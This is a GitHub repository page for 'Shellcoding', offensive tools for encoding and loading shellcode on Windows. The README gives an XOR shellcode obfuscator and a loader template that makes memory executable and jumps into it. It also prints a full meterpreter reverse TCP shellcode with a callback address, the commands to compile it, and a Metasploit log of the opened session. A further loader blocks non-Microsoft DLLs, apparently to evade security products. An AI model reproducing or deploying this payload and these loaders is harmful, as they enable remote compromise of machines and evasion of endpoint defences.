Skip to content

Mr-Un1k0d3r/Shellcoding

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.c
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.c
 
 
README.md
README.md
 
 
encoded-32bitskey-generator.c
encoded-32bitskey-generator.c
 
 
generator.c
generator.c
 
 
generator.exe
generator.exe
 
 
generator.py
generator.py
 
 
loader32.c
loader32.c
 
 
loader64.c
loader64.c
 
 
makefile.py
makefile.py
 
 
raw2hex.py
raw2hex.py
 
 
shellcode_runner.c
shellcode_runner.c
 
 
simple-encoder.c
simple-encoder.c
 
 

Repository files navigation

Shellcoding

Shellcoding Utilities and shellcode obfuscator generator.

Shellcode generator

Choose a key max size int32. Then generate the shellcode using generator.exe. The final payload is created using generator.py.

> generator.exe 1337 path_to_raw_shellcode_file
Encoded using the following key: 0x00000539 (1337)
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

Generate the final payload to be compiled.

python3 generator.py 1337 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
#include <windows.h>

int main() {

    DWORD key = 0x539;
    DWORD dwSize = 23;
    DWORD dwProtection = 0;
    CHAR *shellcode = GlobalAlloc(GPTR, dwSize);
    VirtualProtect(shellcode, dwSize, PAGE_EXECUTE_READWRITE, &dwProtection);

    strcpy(shellcode, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41");

    DWORD *current;
    int i = 0;
    for(i; i < dwSize / 4; i++) {
        current = (DWORD*)shellcode;
        *current = *current ^ key;
        shellcode += 4;
    }
    shellcode -= dwSize;

    asm ("mov %0, %%eax\n\t"
         "push %%eax\n\t"
         "ret"
         :
         : "r" (shellcode));

    // We are probably never going to reach that point
    GlobalFree(shellcode);
    return 0;
}

Finally, compile the output file using GCC and you are good to go.

WARNING

The way that the code is designed will prevent self modifying shellcode to work properly. Since the shellcode is part of the .text section which is by default READ/EXEC shellcode that perform write action will crash. I'm planning on releasing a writable wrapper soon.

Example:

Standard meterpreter shellcode

#include <Windows.h>

int main() {
    asm("call code\n\t"
        ".byte 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xc5,0x84,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5\n\t"
        "code:\n\t"
        "ret\n\t");

        return 0;
}

Compile it

mingw32-gcc.exe -c meterpreter.c -o meterpreter.o
mingw32-g++.exe -o meterpreter.exe meterpreter.o

Profit

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Sending stage (179779 bytes) to 192.168.197.1
[*] Meterpreter session 3 opened (192.168.197.132:8080 -> 192.168.197.1:50634) at 2019-05-11 10:54:26 -0400

meterpreter > sysinfo
Computer        : WTL-SP-4XXHWT2
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : RingZer0
Logged On Users : 7
Meterpreter     : x86/windows
meterpreter >

loader.c

A simple shellcode loader in C. This shellcode loader is not storing the shellcode in the data section. It store it directly in the text section to new to do shady memory allocation to call your shellcode.

The ASM syntax is for GCC compiler it can be adapted for VC too

raw2hex.py

Convert raw shellcode into something else

raw2hex.py rawshellcodefile -list
0x90, 0x90

raw2hex.py rawshellcodefile
\x90\x90

makefile.py

Generate the final C code

makefile.py shellcode.raw output.c

PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.c

C code to execute your payload and avoiding any NON MICROSOFT DLLs from been loaded.

Credit

Mr.Un1k0d3r RingZer0 Team

About

Shellcoding utilities

Resources

Readme
Activity

Stars

216 stars

Watchers

13 watching

Forks

46 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages